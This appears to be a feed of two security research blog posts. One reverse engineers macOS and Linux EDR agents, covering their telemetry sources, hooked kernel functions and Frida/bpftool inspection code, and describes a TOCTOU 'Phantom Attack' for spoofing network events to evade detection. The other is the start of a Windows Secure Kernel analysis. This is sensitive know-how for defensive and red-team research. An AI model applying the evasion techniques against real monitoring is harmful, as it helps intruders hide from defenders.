
EDR Internals for macOS and Linux

3 June 2024 at 15:56

Many public blogs and conference talks have covered Windows telemetry sources like kernel callbacks and ETW, but few mention macOS and Linux equivalents. Although most security professionals may not be surprised by this lack of coverage, one should not overlook these platforms. For example, developers using macOS often have privileged cloud accounts or access to intellectual property like source code. Linux servers may host sensitive databases or customer-facing applications. Defenders must have confidence in their tools for these systems, and attackers must understand how to evade them. This post dives into endpoint security products on macOS and Linux to understand their capabilities and identify weaknesses.

Endpoint detection and response (EDR) agents comprise multiple sensors: components that collect events from one or more telemetry sources. The agent formats raw telemetry data into a standard format and then forwards it to a log aggregator. EDR telemetry data informs tools such as antivirus, but it also informs humans as they manually hunt for threats in the network.

This post should not be considered a comprehensive list of telemetry sources or EDR implementations. Instead, the following observations were made while reverse engineering some of the most popular macOS and Linux agents. Outflank tested the latest version of each product on macOS 14.4.1 (Sonoma) and Linux 5.14.0 (Rocky 9.3). After reviewing previous research, the author will describe relevant security components of macOS and Linux, present their understanding of popular EDR products, and then conclude with a case study on attacking EDR using this knowledge.

Notable EDR Capabilities

Although every product has its own “secret formula” for detecting the latest threats, nearly all EDR agents collect the following event types:

  • Authentication attempts
  • Process creation and termination
  • File access, modification, creation, and deletion
  • Network traffic

Outflank’s research primarily focused on these events, but this post will also cover other OS-specific telemetry.

Previous Research

Security researchers have covered Windows EDR internals in great detail. A quick Google search for “EDR bypass” or “EDR internals” will return an extensive corpus of blogs, conference talks, and open-source tools, all focused on Windows EDR. That said, most companies consulted by the author also deployed an EDR agent to their macOS and Linux systems. These agents are relatively undocumented compared to their Windows counterparts. This lack of information is likely due to the success of open-source tools such as Mythic and Sliver in evading out-of-the-box antivirus solutions (including those bundled with EDR).

Of course, the full Linux kernel source code is available, and Apple publishes documentation, albeit terse, for stable macOS APIs. This alone does not give much insight into the workings of EDR agents, though, as it only describes the possible ways an agent might collect information on a system. One can gain some additional understanding by reviewing open-source projects, such as the outstanding Objective-See collection for macOS or container runtime security projects for Linux. Below is a list of projects that share functionality with EDR agents reversed by Outflank:


Even still, these projects do not fully replicate the capabilities of popular EDR agents. While each may collect a subset of the telemetry used by commercial products, none of these projects appeared to have the same coverage.

Telemetry Sources – macOS

Unsupported Options

In studying macOS internals, one might discover promising security components that commercial products do not use. For instance, many considered kernel extensions (KEXTs) a de facto sensor component of EDR agents until macOS Catalina (2019) began phasing them out. Michael Cahyadi’s post on the transition from kernel extensions to modern alternatives documents the work required to migrate from these frameworks.

Similarly, modern macOS (2016+) implements a standardized logging system called unified logging. Logs are categorized by subsystem (e.g., com.apple.system.powersources.source) and can be viewed with /usr/bin/log or the Console application. While unified log data is great for debugging, the logs are restricted with a private entitlement (com.apple.private.logging.stream), rendering them unusable to third-party EDR agents.

Endpoint Security API

Apple now recommends the Endpoint Security (ES) API for logging most events an EDR agent requires:

  • Authentication attempts
  • Process creation and termination
  • File access, modification, creation, and deletion

The complete list of ES event types in Apple’s documentation follows a standard format: ES_EVENT_TYPE_<RESPONSE TYPE>_<EVENT TYPE NAME>.

The “response type” can be NOTIFY or AUTH, depending on whether the ES client must authorize an action. The “event type name” describes each event. (Examples will be discussed in the following sections.)
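The naming scheme is mechanical, which makes it easy to work with programmatically. A small sketch (the constant strings mirror Apple’s es_event_type_t naming convention, but are treated as plain strings here):

```python
# Split an Endpoint Security event type constant into its response type
# (NOTIFY or AUTH) and event name, following the format described above.
PREFIX = "ES_EVENT_TYPE_"

def parse_es_event_type(constant: str) -> tuple[str, str]:
    if not constant.startswith(PREFIX):
        raise ValueError(f"not an ES event type: {constant}")
    # AUTH events require the client to authorize the action;
    # NOTIFY events are informational only.
    response_type, _, event_name = constant[len(PREFIX):].partition("_")
    return response_type, event_name

print(parse_es_event_type("ES_EVENT_TYPE_NOTIFY_EXEC"))  # ('NOTIFY', 'EXEC')
print(parse_es_event_type("ES_EVENT_TYPE_AUTH_OPEN"))    # ('AUTH', 'OPEN')
```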

Plenty of open-source examples exist for those looking to write an ES API client, but executing them on modern macOS requires the developer to sign their executable with a restricted entitlement or disable SIP on the target system.

Network events are notably absent from the ES API. Instead, EDR agents can utilize an additional sensor that captures events using the NetworkExtension framework.

Following Apple’s deprecation of kernel extensions, events can be collected entirely from user-mode using the ES API and NetworkExtension framework. This differs from Windows and Linux, which rely heavily on kernel-mode sensors.

Identifying ES Event Subscriptions

Red Canary Mac Monitor is a free, closed-source ES client. It uses a system extension, so the client must be embedded within its application bundle in Contents/Library/SystemExtensions/. In this case, the bundle’s entitlements can be listed using the codesign utility.


codesign -d --entitlements :- /Applications/Red\ Canary\ Mac\ Monitor.app/Contents/Library/SystemExtensions/com.redcanary.agent.securityextension.systemextension

The output property list will vary depending on the target system extension, but all ES clients must have the com.apple.developer.endpoint-security.client entitlement.


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>com.apple.application-identifier</key>
      <string>UA6JCQGF3F.com.redcanary.agent.securityextension</string>
    <key>com.apple.developer.endpoint-security.client</key>
      <true/>
    <key>com.apple.developer.team-identifier</key>
        <string>UA6JCQGF3F</string>
    <key>com.apple.security.application-groups</key>
      <array>
        <string>UA6JCQGF3F</string>
      </array>
  </dict>
</plist>
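Checking for the client entitlement programmatically is a one-liner with Python’s plistlib, fed the XML that codesign emits (a sketch; the sample below is a trimmed copy of the entitlements above):

```python
import plistlib

ES_CLIENT = "com.apple.developer.endpoint-security.client"

def is_es_client(entitlements_xml: bytes) -> bool:
    """True if codesign-extracted entitlements mark an ES client."""
    return bool(plistlib.loads(entitlements_xml).get(ES_CLIENT, False))

# The Red Canary entitlements from above, trimmed to the relevant key.
sample = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>com.apple.developer.endpoint-security.client</key>
  <true/>
</dict>
</plist>"""
print(is_es_client(sample))  # True
```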

ES clients must initialize the API using two functions exported by libEndpointSecurity.dylib: es_new_client and es_subscribe. The latter is particularly interesting because it indicates to the ES API which events the client should receive. Once a client of interest has been discovered, it can be instrumented using Frida (after disabling SIP). The es_subscribe function takes two parameters of interest: the number of events (event_count) and a pointer to the list of event IDs (events).


es_return_t es_subscribe(es_client_t* client, const es_event_type_t* events, uint32_t event_count);

With this information, one can inject a target system extension process with Frida and hook es_subscribe to understand which events it subscribes to. The function will likely only be called when the system extension starts, so analyzing an EDR agent may require some creative thinking. Mac Monitor makes this step easy as the runtime GUI can update the list of events.

A screenshot of the settings window in Mac Monitor that allows a user to select which ES event types the client should subscribe to.
Changing Target ES Events in Red Canary Mac Monitor

Outflank created a simple Frida script to hook es_subscribe and print the list of events, as well as an example Python script to create or inject the process.
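A minimal version of such a hook might look like the following. This is a sketch, not Outflank’s script: it assumes Frida is installed, SIP is disabled, and the target extension’s PID is passed on the command line.

```python
import struct
import sys

# JavaScript payload injected by Frida: hook es_subscribe and send the
# raw event ID array back to Python.
HOOK_JS = """
var es_subscribe = Module.getExportByName("libEndpointSecurity.dylib", "es_subscribe");
Interceptor.attach(es_subscribe, {
    onEnter: function (args) {
        // args[1] = const es_event_type_t *events, args[2] = uint32_t event_count
        var count = args[2].toInt32();
        send({count: count}, args[1].readByteArray(count * 4));
    }
});
"""

def decode_event_ids(raw: bytes) -> list[int]:
    """Decode a packed array of 32-bit es_event_type_t values."""
    return list(struct.unpack(f"<{len(raw) // 4}I", raw))

def main(pid: int) -> None:
    import frida  # imported lazily so the decoder above stays portable
    session = frida.attach(pid)
    script = session.create_script(HOOK_JS)
    script.on("message", lambda msg, data: print(decode_event_ids(data)))
    script.load()
    sys.stdin.read()  # keep running while waiting for es_subscribe calls

if __name__ == "__main__" and len(sys.argv) > 1:
    main(int(sys.argv[1]))
```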

Demo of retrieving ES API subscriptions with Frida
Retrieving ES API Events with Frida

Examining ES Event Types

Even with a list of event types, the actual data available to an ES client may not be clear. Outflank published an open-source tool called ESDump that can subscribe to any currently available event types and output JSON-formatted events to stdout.

The list of event types is defined in config.h at compile-time. For example, the following config will subscribe to the event types selected in the previous section.

A screenshot of ESDump config.h
ESDump Config

Compile the program and then copy it to a macOS system with SIP disabled. ESDump does not have any arguments.

Demo of dumping ES events with ESDump
Dumping Endpoint Security Events

ESDump uses audit tokens to retrieve IDs for the associated process and user. The program resolves process and user names to enrich raw data.

Screenshot of ESDump output where an audit token was used to resolve a process and user name
Process and User Name Resolved from Audit Token
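The enrichment step can be sketched in a few lines. An audit token is an array of eight 32-bit values; the indices used below (EUID at 1, PID at 5) mirror the libbsm audit_token_to_euid/audit_token_to_pid accessors, but treat the layout as an assumption, and the process-name table here is a stand-in for a real PID lookup:

```python
import pwd

# Field indices into audit_token_t.val[8]; these mirror the libbsm
# audit_token_to_euid()/audit_token_to_pid() accessors.
EUID_INDEX = 1
PID_INDEX = 5

def enrich(token: list[int], proc_names: dict[int, str]) -> dict:
    """Resolve user and process names from a raw audit token.

    proc_names stands in for a real PID -> executable lookup
    (e.g., proc_name() from libproc on macOS).
    """
    euid, pid = token[EUID_INDEX], token[PID_INDEX]
    return {
        "pid": pid,
        "process": proc_names.get(pid, "<unknown>"),
        "euid": euid,
        "user": pwd.getpwuid(euid).pw_name,
    }

# A fabricated token for UID 0, PID 1, with an illustrative process table.
token = [0, 0, 0, 0, 0, 1, 0, 0]
print(enrich(token, {1: "launchd"}))
```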

NetworkExtension Framework

Unlike the ES API, the NetworkExtension framework does not have predefined event types. Instead, agents must subclass various framework classes to monitor network traffic. Each of these framework classes requires a different entitlement. The relevant entitlements provide insight into possible use cases:

  • DNS Proxy – Proxy DNS queries and resolve all requests from the system.
  • Content Filter – Allow or deny network connections. Meant for packet inspection and firewall applications.
  • Packet Tunnel – Meant for VPN client applications.

In addition to the DNS request and response data, providers can access metadata about the source process, including its signing identifier and application audit token. Content filter providers can also access the process audit token, which is different from the application audit token if a system process makes a network connection on behalf of an application. In both cases, these properties are enough to find the originating process and user IDs to correlate network extension data with ES API events.

Analyzing Network Extensions

Discovering the network extension provider(s) an agent implements is simple, as they each require separate entitlements. DNSMonitor from Objective-See is an open-source DNS proxy provider. It uses a system extension, so the provider must be embedded within its application bundle in Contents/Library/SystemExtensions/.

A screenshot of macOS Finder showing the content of DNSMonitor's application bundle with the user about to click "Show Package Contents" for the embedded system extension.
Opening a System Extension Bundle

Inside a system extension bundle, there will be a file at Contents/Info.plist describing the extension, including its network extension providers. The NetworkExtension key should be present, with a NEProviderClasses subkey that lists each provider implementation.

<key>NetworkExtension</key>
<dict>
	<key>NEMachServiceName</key>
	<string>VBG97UB4TA.com.objective-see.dnsmonitor</string>
	<key>NEProviderClasses</key>
	<dict>
		<key>com.apple.networkextension.dns-proxy</key>
		<string>DNSProxyProvider</string>
	</dict>
</dict>

The value for each provider type gives the name of the implementing class. This information is enough to start reversing an extension using a tool like Hopper.

A screenshot of Hopper on macOS where the built-in search is used to find methods of the "DNSProxyProvider" class.
DNS Proxy Provider Class Methods

Creating a Network Extension

While knowing the providers implemented by a macOS network extension is valuable, more is needed to understand the data available to the agent. Outflank released an open-source tool called NEDump that implements a content filter provider and writes JSON-formatted events to stdout. The application and system extension must be signed, even with SIP disabled, so the repository includes a signed release binary. As a system extension is utilized, the application must be copied to /Applications/ to function. No arguments are required to execute NEDump and start receiving event data.

Demo of dumping content filter events with NEDump
Dumping Content Filter Events

Telemetry Sources – Linux

While Linux components are deprecated less often than their macOS equivalents, most Linux EDR agents had comparably modern implementations. For example, Auditd could provide the necessary telemetry for an EDR agent, but newer alternatives offer better performance. In addition, only one program can subscribe to Auditd at a time, so the agent may conflict with other software. Performance and compatibility problems are among the most common EDR complaints, likely explaining why Outflank did not observe any products using Auditd by default.

Kernel Function Tracing

The observed agents all utilized kernel function tracing as their primary telemetry sources. Linux offers several ways to “hook” kernel functions to inspect their arguments and context. Popular EDR agents used the following trace methods:

  • Kprobes and Return Probes – Any kernel function (or address) that a client resolves can be traced using kernel probes. Function resolution requires kernel symbols to be available and likely requires different addresses for kernel versions or even distributions. Target functions may even be unavailable due to compile-time optimizations.
  • Tracepoints – A “tracepoint” is a function call added to various functions in the Linux kernel that can be hooked at runtime. These work similarly to kprobes but should be faster and do not require function resolution. However, some target functions may not have a tracepoint.
    • Raw Tracepoints – A “raw” tracepoint is a more performant alternative to any non-syscall or sys_enter/sys_exit tracepoint. These hooks can also monitor syscalls that don’t have a dedicated tracepoint.
  • Function Entry/Exit Probes – Fentry and fexit probes act similarly to tracepoints, but they rely on compiler-added instrumentation at function entry and exit (e.g., GCC’s -pg).
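The lowest-level of these interfaces has a simple text API: kprobes can be registered by writing definition strings to tracefs, no eBPF required. The sketch below only builds the definition strings in the documented `p[:[GRP/]EVENT] SYM` format (the `edr` group and symbol names are illustrative; actually registering them requires root):

```python
# Build kprobe/kretprobe definitions for the tracefs text interface
# (Documentation/trace/kprobetrace.rst in the kernel source).
def kprobe_def(symbol: str, group: str = "edr", ret: bool = False) -> str:
    kind = "r" if ret else "p"  # "p" = kprobe, "r" = return probe
    return f"{kind}:{group}/{kind}_{symbol} {symbol}"

for d in (kprobe_def("do_filp_open"), kprobe_def("do_filp_open", ret=True)):
    print(d)

# Registering would then be (as root):
#   echo 'p:edr/p_do_filp_open do_filp_open' >> /sys/kernel/tracing/kprobe_events
```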

Kernel-Mode Programming

Traditionally, only loadable kernel modules (LKMs) could use kernel tracing features. LKMs are similar to Windows drivers—crashes may result in unrecoverable kernel errors, raising similar stability concerns. Linux kernel 4.x addressed these concerns with an “extended” version of the Berkeley Packet Filter, called eBPF, which allows developers to load small, verifiable programs into the kernel. eBPF programs have material constraints, but they should mitigate the stability risks of LKM-based sensors. Only newer kernel versions support eBPF and certain advanced eBPF features, and customers may not have these versions deployed across their environments. This has led many EDR vendors to offer two (or more!) versions of their Linux agent, each targeting a different kernel version.

Liz Rice from Isovalent wrote an excellent, free book on eBPF. The company also has a free eBPF lab on its website for those who prefer a hands-on approach. Many open-source projects demonstrate good examples of eBPF-based tracing. This post only covers the newest eBPF variant of each agent, but it is safe to assume that other variants collect similar information with a slightly modified eBPF or LKM-based sensor.

Analyzing eBPF Programs

Two components of eBPF-based sensors may provide insights into their implementation: programs and maps. Each eBPF program typically monitors a single kernel function and uses a map to communicate with the user-mode agent. Microsoft SysmonForLinux is a well-documented, open-source eBPF-based monitoring tool. It uses several tracepoints to monitor process, file, and networking events. Once installed, a complete list of currently loaded programs can be retrieved using bpftool with the bpftool prog list command. The results usually include unrelated programs, but the PIDs can identify relevant results, as seen below.


52: raw_tracepoint  name ProcCreateRawExit  tag ebba2584bc0537a4  gpl
        loaded_at 2024-05-14T12:42:20-0500  uid 0
        xlated 6912B  jited 3850B  memlock 8192B  map_ids 3,5,11,9,8,10
        btf_id 54
        pids sysmon(807)

The bytecode of an eBPF program is accessible as well, using the bpftool prog dump command.


int ProcCreateRawExit(struct bpf_our_raw_tracepoint_args * ctx):
0xffffffffc02f18e8:
; int ProcCreateRawExit(struct bpf_our_raw_tracepoint_args *ctx)
   0:	nopl   0x0(%rax,%rax,1)
   5:	xchg   %ax,%ax
   7:	push   %rbp
   8:	mov    %rsp,%rbp
   b:	sub    $0x98,%rsp
  12:	push   %rbx

Additionally, the bpftool map list command will retrieve a complete list of maps. Again, there are unrelated results, but the PIDs describe associated processes.

11: array  name eventStorageMap  flags 0x0
        key 4B  value 65512B  max_entries 512  memlock 33546240B
        pids sysmon(807) 

The contents of a map can be accessed with bpftool map dump.


key:
00 00 00 00
value:
01 ff 00 00 40 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
ea 02 00 00 0c 56 00 00  85 88 52 b5 30 ee 3c 00
00 00 08 00 24 81 00 00  61 d7 37 66 00 00 00 00
ac 4e a8 08 00 00 00 00  61 d7 37 66 00 00 00 00
ac 4e a8 08 d7 8f ff ff  61 d7 37 66 00 00 00 00
ac 4e a8 08 00 00 00 00  00 00 00 00 20 00 00 00

Retrieving the name and bytecode for each program should be enough to understand which functions an eBPF agent monitors. Outflank created a Bash script to expedite the enumeration described above.
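The same enumeration can be scripted against bpftool’s JSON output (`bpftool prog list -j`). A sketch that filters the parsed output by process name; the sample input mimics the sysmon listing shown earlier, and assumes the `pids` field is present:

```python
import json

def progs_for(process_name: str, bpftool_json: str) -> list[dict]:
    """Return programs whose pids list references the given process.

    bpftool_json is the output of `bpftool prog list -j`, whose entries
    carry id, type, name, and (when available) a pids array.
    """
    progs = json.loads(bpftool_json)
    return [
        p for p in progs
        if any(pid.get("comm") == process_name for pid in p.get("pids", []))
    ]

# Trimmed-down sample resembling the sysmon output above.
sample = json.dumps([
    {"id": 52, "type": "raw_tracepoint", "name": "ProcCreateRawExit",
     "pids": [{"pid": 807, "comm": "sysmon"}]},
    {"id": 60, "type": "cgroup_skb", "name": "unrelated", "pids": []},
])
for prog in progs_for("sysmon", sample):
    print(prog["id"], prog["name"])
```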

Sensor Implementations – macOS

The EDR agents Outflank reviewed on macOS all had similar implementations. The following sections aim to describe commonalities as well as any unique approaches.

Authentication Events

Multiple agents collected authentication data using getutxent, some at regular intervals and others in response to specific events. For instance, one agent used the Darwin Notification API to subscribe to com.apple.system.utmpx events. Outflank created another Frida script that can be used with the hook.py script to examine these subscriptions.

Other agents subscribed to the following ES API events as a trigger to check utmpx:

  • AUTHENTICATION – The most general authentication event. Generated by normal login, sudo usage, and some remote logins.
  • PTY_GRANT/CLOSE – Records each pseudoterminal control device (shell session), including local Terminal and remote SSH connections.
  • LW_SESSION_LOGIN/LOGOUT – Occurs when a user logs in normally. Includes the username and a “graphical session ID” that appears to track whether a session has ended.
  • OPENSSH_LOGIN/LOGOUT – SSH logins, including failed attempts. Includes the username and source address.
  • LOGIN_LOGIN/LOGOUT – Official documentation states these events are generated for each “authenticated login event from /usr/bin/login”. The author was unable to produce events of this type.

Process Events

All the reviewed macOS agents subscribed to the following process event types.

  • EXEC
  • FORK
  • EXIT

File Events

All the reviewed macOS agents subscribed to the following file event types:

  • CREATE
  • OPEN
  • CLOSE
  • LINK
  • UNLINK
  • RENAME
  • MOUNT
  • CLONE
  • SETMODE
  • SETOWNER
  • SETFLAGS
  • SETEXTATTR

A subset of the agents subscribed to additional event types:

  • UNMOUNT
  • READDIR
  • DELETEEXTATTR
  • SETATTRLIST
  • REMOUNT
  • TRUNCATE
  • SETACL – Although macOS uses POSIX file permissions, it also implements more granular access control using Access Control Lists (ACL).

Network Events

All the reviewed macOS agents used a network extension to implement a content filter provider. Refer to the previous sections for more information on the data available to content filters.

macOS-Specific Events

Each macOS agent was subscribed to a subset of the following OS-specific events:

  • REMOTE_THREAD_CREATE
  • PROC_SUSPEND_RESUME
  • XP_MALWARE_DETECTED – XProtect, the built-in macOS antivirus, detected malware. A complementary event type, XP_MALWARE_REMEDIATED, indicates that malware was removed.
  • GET_TASK_READ/INSPECT/NAME – A process retrieved the task control/read/inspect/name port for another process. Mach ports are an IPC mechanism on macOS.
  • CS_INVALIDATED – The code signing status for a process is now invalid, but that process is still running.
  • SIGNAL – A process sent a signal to another process.
  • UIPC_CONNECT – A process connected to a UNIX domain socket.
  • BTM_LAUNCH_ITEM_ADD – A launch item was made known to background task management. This includes common macOS persistence methods like launch agents/daemons and login items.

Sensor Implementations – Linux

Unlike macOS agents, the Linux agents reviewed by Outflank had much greater diversity in their implementations. The following sections compare approaches taken by various products.

Authentication Events

A subset of the reviewed Linux agents hooked the following PAM functions:

  • pam_authenticate – Includes failed login attempts.
  • pam_open_session – Likely required to correlate other events with a user session.

Other agents monitored specific files to capture authentication events:

  • /var/run/utmp
  • /var/log/btmp – Includes failed login attempts.
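File-based monitoring is easy to reproduce because the utmp record layout is fixed. The sketch below decodes one record using the glibc struct utmp layout on x86-64 (384 bytes per record); treat the field offsets as an assumption for other libcs, and the packed record here stands in for a real read from /var/run/utmp:

```python
import struct

# glibc struct utmp on x86-64, 384 bytes per record:
# short ut_type; pad; int ut_pid; char ut_line[32]; char ut_id[4];
# char ut_user[32]; char ut_host[256]; struct exit_status (2 shorts);
# int32 ut_session; int32 tv_sec; int32 tv_usec; int32 ut_addr_v6[4];
# 20 unused bytes.
UTMP_FORMAT = "<h2xi32s4s32s256s2h3i4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)  # 384
USER_PROCESS = 7  # ut_type for a normal login session

def parse_record(raw: bytes) -> dict:
    fields = struct.unpack(UTMP_FORMAT, raw)
    return {
        "type": fields[0],
        "pid": fields[1],
        "line": fields[2].rstrip(b"\x00").decode(),
        "user": fields[4].rstrip(b"\x00").decode(),
        "host": fields[5].rstrip(b"\x00").decode(),
    }

# Synthetic record standing in for a real read from /var/run/utmp.
raw = struct.pack(UTMP_FORMAT, USER_PROCESS, 4242, b"pts/0", b"ts/0",
                  b"alice", b"203.0.113.7", 0, 0, 0, 0, 0, 0, 0, 0, 0, b"")
print(parse_record(raw))
```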

Process Events

Each Linux agent used a tracepoint (some used raw tracepoints) for sched_process_exec. One product also placed a fentry probe on finalize_exec, an internal kernel function called by execve, but it was unclear what additional information this could provide. Only some agents appeared to monitor fork usage with a sched_process_fork tracepoint. All agents monitored process termination with tracepoints or fentry probes on sched_process_exit, taskstats_exit, sys_exit_setsid, or exit.

File Events

A subset of the reviewed Linux agents only monitored the following syscalls using fentry probes or kprobes:

  • chdir
  • chmod
  • chown
  • clone
  • clone_file_range
  • copy_file_range
  • dup
  • fallocate
  • fchdir
  • fchmod
  • fchmodat
  • fchown
  • fchownat
  • openat
  • pwrite
  • read
  • rename
  • renameat
  • renameat2
  • sendfile
  • setfsgid
  • setfsuid
  • setgid
  • setregid
  • setresgid
  • setreuid
  • setsid
  • setuid
  • truncate
  • unlink
  • unlinkat
  • unshare
  • write

While some agents relied entirely on syscalls, others only traced a few and attached fentry probes or kprobes to the following internal kernel functions:

  • chmod_common
  • chown_common
  • do_filp_open
  • ioctl_file_clone
  • locks_remove_file
  • mnt_want_write
  • notify_change
  • security_file_open
  • security_file_permission
  • security_inode_getattr
  • security_inode_getxattr
  • security_inode_removexattr
  • security_inode_setxattr
  • security_inode_unlink
  • security_mmap_file
  • security_path_link
  • security_path_mkdir
  • security_path_rename
  • security_path_unlink
  • security_sb_free
  • security_sb_mount
  • vfs_copy_file_range
  • vfs_fallocate
  • vfs_link
  • vfs_rename
  • vfs_unlink
  • vfs_write

Network Events

Outflank observed two general strategies for monitoring network traffic. Some agents monitored the following syscalls using kprobes or fentry probes:

  • socket
  • bind
  • accept
  • setsockopt
  • socketcall

Instead of monitoring networking syscalls, the remaining agents traced the following internal kernel functions with fentry or kprobes:

  • sock_create
  • inet_bind/inet6_bind
  • inet_sendmsg/inet6_sendmsg
  • inet_recvmsg/inet6_recvmsg
  • inet_csk_accept
  • inet_accept
  • inet_listen
  • tcp_close
  • inet_release
  • tcp_v4_connect/tcp_v6_connect
  • inet_dgram_connect – UDP
  • inet_stream_connect – TCP
  • sock_common_recvmsg – DCCP
  • sk_attach_filter – Called when SO_ATTACH_FILTER is passed to setsockopt.

Linux-Specific Events

Each Linux agent subscribed to a subset of the following OS-specific events.

  • security_bpf_map – Another program on the system can access or modify eBPF maps, but it usually requires the CAP_SYS_ADMIN or CAP_BPF capability. This means privileged users may be able to tamper with sensor data to silence or even spoof events. In response, some EDR agents monitor eBPF to protect their programs and maps.
  • security_ptrace_access_check – Monitors ptrace attempts.
  • security_netlink_send – Monitors netlink, an interface for sharing data between user-mode processes and the Linux kernel.
  • madvise – The author suspects some agents hooked this syscall to detect the exploitation of vulnerabilities like Dirty COW.

Case Study: Spoofing Linux Syscalls

Diving into an application often inspires security researchers to discover logical flaws that lead to unintended yet desirable results. The example highlighted in this section still affects popular commercial products, and the author hopes to inspire additional community research in this space.

Phantom Attack

At DEF CON 29, Rex Guo and Junyuan Zeng exploited a TOCTOU vulnerability in Falco and Tracee. Their exploit for “Phantom Attack v1” demonstrates an ability to spoof specific fields in some network (connect) and file (openat) events. The attack requires three separate threads, as shown below.

A flow diagram of the Linux Phantom V1 exploit
Phantom Attack Steps

A slight variation is required for the openat syscall, but it is conceptually similar. Ideally, the time-of-use (immediately after the page fault is handled) happens before benign data can be written to the original page. In practice, their POC was very reliable but required elevated privileges. According to its manual, userfaultfd requires the CAP_SYS_PTRACE capability since Linux 5.2. An alternative method of extending the TOCTOU window would be enough to exploit this vulnerability as a normal user.
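The ordering can be illustrated with a toy model. This is a simulation only, not the POC: threading events stand in for the userfaultfd-controlled page fault that sequences the race, and the strings stand in for the sockaddr contents.

```python
import threading

# Toy model of the Phantom v1 ordering described above.
sockaddr = ["google.com"]      # real target the kernel will use
used = threading.Event()       # set once the kernel has copied the data
spoofed = threading.Event()    # set once the attacker rewrote the buffer

def attacker() -> None:
    # After the kernel's copy (time-of-use), overwrite the page with
    # benign data before the syscall-level sensor reads it.
    used.wait()
    sockaddr[0] = "10.0.0.1"
    spoofed.set()

def sensor() -> str:
    # Time-of-check: a syscall-tracing sensor dereferences the same
    # user pointer later and logs whatever is there now.
    spoofed.wait()
    return sockaddr[0]

t = threading.Thread(target=attacker)
t.start()
connected_to = sockaddr[0]     # time-of-use: kernel copies the real target
used.set()
logged = sensor()
t.join()
print(f"kernel connected to {connected_to}, sensor logged {logged}")
```

The real attack replaces the two events with a page fault on the sockaddr page, which is why it works against sensors that dereference user-mode pointers at syscall boundaries.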

Falco and Tracee used kernel function tracing, but they were vulnerable to the attack because they traced system calls instead of internal kernel functions. Arguments provided by user-mode were evaluated directly, including pointers to memory allocated by the calling process. As described above, some EDR agents monitored networking with syscall kprobes, implying they are likely vulnerable to the same attack. Indeed, Outflank’s fork of the “Phantom Attack v1” POC for connect worked against multiple EDR products in testing. As demonstrated below, the original code was modified to make an HTTP GET request to the target (in this case, google.com) and output the response.

A screenshot of an unnamed EDR console, proving it was affected by the TOCTOU vulnerability
Spoofing the Remote IP for connect

Outflank utilizes its knowledge of Windows, macOS, and Linux EDR to identify opportunities for evasion. In order to help other red teams easily implement these techniques and more, we’ve developed Outflank Security Tooling (OST), a broad set of evasive tools that allow users to safely and easily perform complex tasks. Consider scheduling an expert-led demo to learn more about the diverse offerings in OST.


Windows Internals: Dissecting Secure Image Objects - Part 1

1 June 2024 at 00:00

Introduction

Recently I have been working on an unpublished (at this time) blog post examining how securekernel.exe and ntoskrnl.exe work together to enable and support the Kernel Control Flow Guard (Kernel CFG) feature, which is enabled under certain circumstances on modern Windows systems. This comes from the fact that I have recently been receiving questions from others on this topic. During the course of my research, I realized that a relatively unknown topic kept reappearing in my analysis: the concept of Normal Address Ranges (NARs) and Normal Address Table Entries (NTEs), sometimes referred to as NT Address Ranges or NT Address Table Entries. The only mention I have seen of these terms comes from Windows Internals 7th Edition, Part 2, Chapter 9, written by Andrea Allievi. The more I dug in, the more I realized this topic could probably use its own blog post.

However, when I started working on that blog post, I realized that the concept of “Secure Image Objects” also plays into NAR and NTE creation. Because of this, I figured I could just start with Secure Image objects!

Given the lack of debugging capabilities for securekernel.exe, the lack of user-defined types (UDTs) in the securekernel.exe symbols, and the overall lack of public information, there is no way (as we will see) I will be able to completely map Secure Image objects back to absolute structure definitions (and the same goes for NARs/NTEs). This blog and subsequent ones are really just analysis posts outlining things such as Secure System Calls, functionality, the reverse engineering methodology I take, etc. I am not an expert on this subject matter (like Andrea, Satoshi Tanda, or others) and am mainly writing up my analysis because there isn’t much information out there on these subjects and I also greatly enjoy writing long-form blog posts. With that said, the “song-and-dance” performed between NT and the Secure Kernel to load images, share resources, etc. is a very complex (in my mind) topic. The terms I use are based on the names of the functions, for example, and may differ from the official terminology. So please feel free to reach out with improvements/corrections. Lastly, Secure Image objects can be created for images other than drivers; we will be focusing on driver loads. With this said, I hope you enjoy!

SECURE_IMAGE Overview

Windows Internals, 7th Edition, Chapter 9 gives a brief mention of SECURE_IMAGE objects:

…The NAR contains some information of the range (such as its base address and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers (in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated by the NT memory manager as private pages that contain executable code…

As we know with HVCI (at the risk of being interpreted as pretentious, which is not my intent, I have linked my own blog post), VTL 1 is responsible for enforcing W^X (write XOR execute, meaning WX memory is not allowed). Given that drivers can be dynamically loaded at anytime on Windows, VTL 0 and VTL 1 need to work together in order to ensure that before such drivers are actually loaded, the Secure Kernel has the opportunity to apply the correct safeguards to ensure the new driver isn’t used, for instance, to load unsigned code. This whole process starts with the creation of the Secure Image object.

This is required because the Secure Kernel needs to monitor access to some of the memory present in VTL 0, where “normal” drivers live. Secure Image objects allow the Secure Kernel to manage the state of these runtime drivers. Managing the state of these drivers is crucial to enforcing many of the mitigations provided by virtualization capabilities, such as HVCI. A very basic example of this is when a driver is being loaded in VTL 0, we know that VTL 1 needs to create the proper Second Layer Address Translation (SLAT) protections for each of the given sections that make up the driver (e.g., the .text section should be RX, .data RW, etc.). In order for VTL 1 to do that, it would likely need some additional information and context, such as maybe the address of the entry point of the image, the number of PE sections, etc. - this is the sort of thing a Secure Image object can provide - which is much of the needed context that the Secure Kernel needs to “do its thing”.

This whole process starts with code in NT: upon loading a runtime driver, NT extracts the headers from the image being loaded and sends this information to the Secure Kernel to perform the initial header verification and build out the Secure Image object.

